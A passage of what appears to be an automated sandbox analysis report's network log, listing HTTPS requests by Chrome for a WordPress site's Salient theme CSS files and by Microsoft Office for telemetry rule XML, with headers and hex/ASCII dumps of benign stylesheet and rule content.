                                                                                                                      Data Ascii: .carousel-outer{overflow:hidden;margin-right:2px}body[data-ajax-transitions=true] .row.carousel{opacity:1}.carousel-heading{z-index:100;position:relative;margin-bottom:7px;min-height:23px}.carousel-heading h2{font-weight:700;text-transform:uppercase;lette
                                                                                                                      2024-12-03 07:55:17 UTC1998INData Raw: 61 74 61 2d 66 75 6c 6c 2d 77 69 64 74 68 3d 66 61 6c 73 65 5d 20 2e 63 61 72 6f 75 73 65 6c 2d 70 72 65 76 3a 61 66 74 65 72 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 63 6f 6e 74 65 6e 74 3a 27 20 27 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 32 34 70 78 3b 68 65 69 67 68 74 3a 32 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 3b 74 6f 70 3a 38 70 78 3b 6f 70 61 63 69 74 79 3a 30 3b 6c 65 66 74 3a 2d 34 70 78 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 2d 32 30 70 78 29 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 32 35 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 32 2c 2e 37 35 2c 2e 34 2c 31 29 3b 2d 77 65 62 6b 69
                                                                                                                      Data Ascii: ata-full-width=false] .carousel-prev:after{display:block;content:' ';position:absolute;width:24px;height:2px;background-color:#000;top:8px;opacity:0;left:-4px;cursor:pointer;transform:translateX(-20px);transition:all .25s cubic-bezier(.12,.75,.4,1);-webki


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      86192.168.2.449849196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:17 UTC616OUTGET /wp-content/themes/salient/css/build/elements/element-button-legacy.css?ver=15.0.6 HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                      Referer: https://www.itnaledi.co.za/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:17 UTC282INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:17 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Fri, 02 Dec 2022 09:26:33 GMT
                                                                                                                      ETag: "177f-5eed4eef40440"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 6015
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Type: text/css
                                                                                                                      2024-12-03 07:55:17 UTC6015INData Raw: 2e 6e 2d 73 63 2d 62 75 74 74 6f 6e 5b 63 6c 61 73 73 2a 3d 67 72 61 64 69 65 6e 74 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 21 69 6d 70 6f 72 74 61 6e 74 3b 6f 70 61 63 69 74 79 3a 31 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 7d 2e 6e 2d 73 63 2d 62 75 74 74 6f 6e 5b 63 6c 61 73 73 2a 3d 67 72 61 64 69 65 6e 74 5d 3a 61 66 74 65 72 2c 2e 6e 2d 73 63 2d 62 75 74 74 6f 6e 5b 63 6c 61 73 73 2a 3d 67 72 61 64 69 65 6e 74 5d 5b 63 6c 61 73 73 2a 3d 73 65 65 2d 74 68 72 6f 75 67 68 5d 3a 61 66 74 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 63 6f 6e 74 65 6e 74 3a 27 20 27 3b 74 6f 70 3a 2d 32 25 3b 6c 65 66 74 3a 2d 31 25 3b 77 69 64 74 68 3a 31 30 31 2e 35 25 3b 68 65 69 67 68 74 3a 31
                                                                                                                      Data Ascii: .n-sc-button[class*=gradient]{background-color:transparent!important;opacity:1;box-shadow:none}.n-sc-button[class*=gradient]:after,.n-sc-button[class*=gradient][class*=see-through]:after{position:absolute;content:' ';top:-2%;left:-1%;width:101.5%;height:1


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      87192.168.2.44985013.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:17 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:17 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:17 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 419
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                      ETag: "0x8DC582B9FF95F80"
                                                                                                                      x-ms-request-id: 27481374-801e-0078-46b4-42bac6000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075517Z-174f784596886s2bhC1EWR743w00000015kg00000000akcu
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:17 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      88192.168.2.44985213.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:18 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:18 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:18 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 468
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                      ETag: "0x8DC582BB3EAF226"
                                                                                                                      x-ms-request-id: 3ccb05f8-401e-0016-1b69-3f53e0000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075518Z-174f7845968xr5c2hC1EWRd0hn0000000qfg000000005dkh
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:18 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      89192.168.2.44985113.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:18 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:18 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:18 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 472
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                      ETag: "0x8DC582BB650C2EC"
                                                                                                                      x-ms-request-id: a15be10d-401e-0029-636c-439b43000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075518Z-174f7845968swgbqhC1EWRmnb400000015t0000000005puv
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:18 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      90192.168.2.44985313.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:18 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:18 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:18 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 485
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                      ETag: "0x8DC582BB9769355"
                                                                                                                      x-ms-request-id: e579458c-401e-0064-1dbd-4254af000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075518Z-174f78459688l8rvhC1EWRtzr00000000k80000000004ghw
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:18 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      91192.168.2.44984213.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:18 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:18 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:18 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 477
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                      ETag: "0x8DC582BA54DCC28"
                                                                                                                      x-ms-request-id: 3f63c6b9-401e-0064-499d-4354af000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075518Z-174f78459685m244hC1EWRgp2c00000015eg0000000063pu
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:18 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      92192.168.2.449854196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:18 UTC596OUTGET /wp-content/themes/salient/css/build/responsive.css?ver=15.0.6 HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                      Referer: https://www.itnaledi.co.za/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:19 UTC283INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:18 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Fri, 02 Dec 2022 09:26:33 GMT
                                                                                                                      ETag: "9a32-5eed4eef40440"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 39474
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Type: text/css
                                                                                                                      2024-12-03 07:55:19 UTC7909INData Raw: 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 33 30 30 70 78 29 7b 2e 63 6f 6e 74 61 69 6e 65 72 2c 2e 70 6f 73 74 2d 61 72 65 61 2e 73 74 61 6e 64 61 72 64 2d 6d 69 6e 69 6d 61 6c 2e 66 75 6c 6c 2d 77 69 64 74 68 2d 63 6f 6e 74 65 6e 74 20 2e 70 6f 73 74 20 2e 69 6e 6e 65 72 2d 77 72 61 70 7b 6d 61 78 2d 77 69 64 74 68 3a 31 31 30 30 70 78 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 30 30 30 70 78 29 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 31 33 30 30 70 78 29 7b 23 61 75 74 68 6f 72 2d 62 69 6f 20 23 61 75 74 68 6f 72 2d 69 6e 66 6f 7b 77 69 64 74 68 3a 35 34 34 70 78 7d 23 70 72 6f 6a 65 63 74 2d 6d 65 74 61 20 75 6c 20
                                                                                                                      Data Ascii: @media only screen and (min-width:1300px){.container,.post-area.standard-minimal.full-width-content .post .inner-wrap{max-width:1100px}}@media only screen and (min-width:1000px) and (max-width:1300px){#author-bio #author-info{width:544px}#project-meta ul
                                                                                                                      2024-12-03 07:55:19 UTC8000INData Raw: 67 2d 69 6d 67 3a 61 66 74 65 72 7b 6f 70 61 63 69 74 79 3a 31 7d 62 6f 64 79 20 2e 70 6f 72 74 66 6f 6c 69 6f 2d 69 74 65 6d 73 5b 64 61 74 61 2d 70 73 3d 22 36 22 5d 20 2e 77 69 64 65 5f 74 61 6c 6c 20 2e 77 6f 72 6b 2d 69 74 65 6d 20 2e 77 6f 72 6b 2d 6d 65 74 61 20 2e 69 6e 6e 65 72 2c 62 6f 64 79 20 2e 70 6f 72 74 66 6f 6c 69 6f 2d 69 74 65 6d 73 5b 64 61 74 61 2d 70 73 3d 22 36 22 5d 20 2e 77 6f 72 6b 2d 69 74 65 6d 20 2e 77 6f 72 6b 2d 6d 65 74 61 20 2e 69 6e 6e 65 72 7b 6f 70 61 63 69 74 79 3a 31 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 2e 62 6f 74 74 6f 6d 5f 63 6f 6e 74 72 6f 6c 73 20 23 70 6f 72 74 66 6f 6c 69 6f 2d 6e 61 76 20 2e 63 6f 6e 74 72
                                                                                                                      Data Ascii: g-img:after{opacity:1}body .portfolio-items[data-ps="6"] .wide_tall .work-item .work-meta .inner,body .portfolio-items[data-ps="6"] .work-item .work-meta .inner{opacity:1;transform:scale(1);-webkit-transform:scale(1)}.bottom_controls #portfolio-nav .contr
                                                                                                                      2024-12-03 07:55:19 UTC8000INData Raw: 20 23 6c 6f 67 6f 20 69 6d 67 7b 6d 61 72 67 69 6e 3a 30 7d 23 68 65 61 64 65 72 2d 6f 75 74 65 72 5b 64 61 74 61 2d 68 61 73 2d 6d 65 6e 75 3d 66 61 6c 73 65 5d 5b 64 61 74 61 2d 66 6f 72 6d 61 74 3d 64 65 66 61 75 6c 74 5d 20 23 74 6f 70 20 2e 73 70 61 6e 5f 33 2c 23 68 65 61 64 65 72 2d 6f 75 74 65 72 5b 64 61 74 61 2d 68 61 73 2d 6d 65 6e 75 3d 74 72 75 65 5d 20 23 74 6f 70 20 2e 73 70 61 6e 5f 33 2c 23 68 65 61 64 65 72 2d 6f 75 74 65 72 5b 64 61 74 61 2d 68 61 73 2d 6d 65 6e 75 3d 74 72 75 65 5d 5b 64 61 74 61 2d 6d 6f 62 69 6c 65 2d 66 69 78 65 64 3d 22 31 22 5d 20 23 74 6f 70 20 2e 73 70 61 6e 5f 33 2c 23 68 65 61 64 65 72 2d 6f 75 74 65 72 5b 64 61 74 61 2d 68 61 73 2d 6d 65 6e 75 3d 74 72 75 65 5d 5b 64 61 74 61 2d 70 74 6e 6d 3d 22 31 22 5d 20
                                                                                                                      Data Ascii: #logo img{margin:0}#header-outer[data-has-menu=false][data-format=default] #top .span_3,#header-outer[data-has-menu=true] #top .span_3,#header-outer[data-has-menu=true][data-mobile-fixed="1"] #top .span_3,#header-outer[data-has-menu=true][data-ptnm="1"]
                                                                                                                      2024-12-03 07:55:19 UTC8000INData Raw: 6f 72 6b 2d 69 74 65 6d 20 2e 77 6f 72 6b 2d 69 6e 66 6f 20 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 65 6e 74 20 2e 6e 65 63 74 61 72 2d 62 75 74 74 6f 6e 7b 77 69 64 74 68 3a 61 75 74 6f 7d 23 70 61 67 65 2d 68 65 61 64 65 72 2d 62 67 2c 23 70 61 67 65 2d 68 65 61 64 65 72 2d 77 72 61 70 2c 62 6f 64 79 20 2e 6e 65 63 74 61 72 2d 62 75 74 74 6f 6e 2e 73 65 65 2d 74 68 72 6f 75 67 68 2d 32 2c 62 6f 64 79 20 2e 6e 65 63 74 61 72 2d 62 75 74 74 6f 6e 2e 73 65 65 2d 74 68 72 6f 75 67 68 2d 33 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 23 61 6a 61 78 2d 63 6f 6e 74 65 6e 74 2d 77 72 61 70 20 2e 77 70 2d 63 61 70 74 69 6f 6e 7b
                                                                                                                      Data Ascii: ork-item .work-info .custom-content .nectar-button{width:auto}#page-header-bg,#page-header-wrap,body .nectar-button.see-through-2,body .nectar-button.see-through-3{transition:none!important;-webkit-transition:none!important}#ajax-content-wrap .wp-caption{
                                                                                                                      2024-12-03 07:55:19 UTC7565INData Raw: 66 65 63 74 3d 7a 6f 6f 6d 2d 6f 75 74 5d 20 2e 70 61 67 65 2d 68 65 61 64 65 72 2d 62 67 2d 69 6d 61 67 65 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 6e 6f 6e 65 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 6e 6f 6e 65 7d 23 70 61 67 65 2d 68 65 61 64 65 72 2d 62 67 5b 64 61 74 61 2d 70 61 72 61 6c 6c 61 78 3d 22 31 22 5d 2c 23 70 61 67 65 2d 68 65 61 64 65 72 2d 62 67 5b 64 61 74 61 2d 70 61 72 61 6c 6c 61 78 3d 22 31 22 5d 20 2e 73 70 61 6e 5f 36 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 7d 23 70 61 67 65 2d 68 65 61 64 65 72 2d 62 67 5b 64 61 74 61 2d 70 61 72 61 6c 6c 61 78 3d 22 31 22 5d 7b 74 6f 70 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 23 70 61 67 65 2d 68 65 61 64 65 72 2d 62 67 20 2e 73 70 61 6e
                                                                                                                      Data Ascii: fect=zoom-out] .page-header-bg-image{transition:none;-webkit-transition:none}#page-header-bg[data-parallax="1"],#page-header-bg[data-parallax="1"] .span_6{position:relative!important}#page-header-bg[data-parallax="1"]{top:0!important}#page-header-bg .span


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      93192.168.2.449855196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:18 UTC599OUTGET /wp-content/themes/salient/css/build/skin-material.css?ver=15.0.6 HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                      Referer: https://www.itnaledi.co.za/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
